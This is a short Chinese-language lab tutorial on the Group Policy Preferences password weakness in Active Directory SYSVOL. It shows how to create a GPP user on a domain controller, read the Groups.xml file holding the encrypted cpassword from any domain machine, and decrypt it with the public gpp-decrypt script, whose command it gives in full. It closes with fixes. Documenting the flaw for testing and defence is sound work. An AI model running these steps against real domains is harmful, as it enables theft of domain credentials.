一、 简介
SYSVOL 是活动目录里面的一个用于存储域公共文件服务器副本的共享文件夹,在域中的所有域控制器之间进行复制。SYSVOL 文件夹是在安装活动目录时自动创建的,主要用来存放登录脚本、组策略数据及其他域控制器需要的域信息等。
SYSVOL 在所有经过身份验证的域用户或者域信任用户具有读权限的活动目录的域范围内共享。整个 SYSVOL 目录在所有的域控制器中是自动同步和共享的。
二、组策略创建(DC上)
- 管理工具->组策略管理
- 新建组策略对象
- 编辑组策略对象,新建用户,输入密码。此时含有加密密码的组策略配置文件已保存至\192.168.x.x\sysvol\hack.com\Policies{0A6A4062-3DAE-4062-A0BD-CC8E69E3CDCC}\Machine\Preferences\Groups\Groups.xml
三、漏洞利用
- 任意域内机器访问:\192.168.x.x\sysvol\hack.com\Policies{0A6A4062-3DAE-4062-A0BD-CC8E69E3CDCC}\Machine\Preferences\Groups\Groups.xml,获取内容如下
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="test2" image="2" changed="2022-04-02 09:17:15" uid="{C6E4F311-F308-4455-92CE-DE5AF2A2D328}"><Properties action="U" newName="" fullName="" description="" cpassword="fvCYIisujMxxxxxxxxxxxxxxxxxRHZ8uw" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" userName="test2"/></User>
</Groups>
- 密码解密(mac或linux上跑):https://github.com/t0thkr1s/gpp-decrypt,
python3 gpp-decrypt.py -c fvCYIisujMu8OXz3lQzn/OHXEluY6RYgl89kpRHZ8uw
四、修复
- 安装 KB2962486补丁
- 给sysvol文件夹设置权限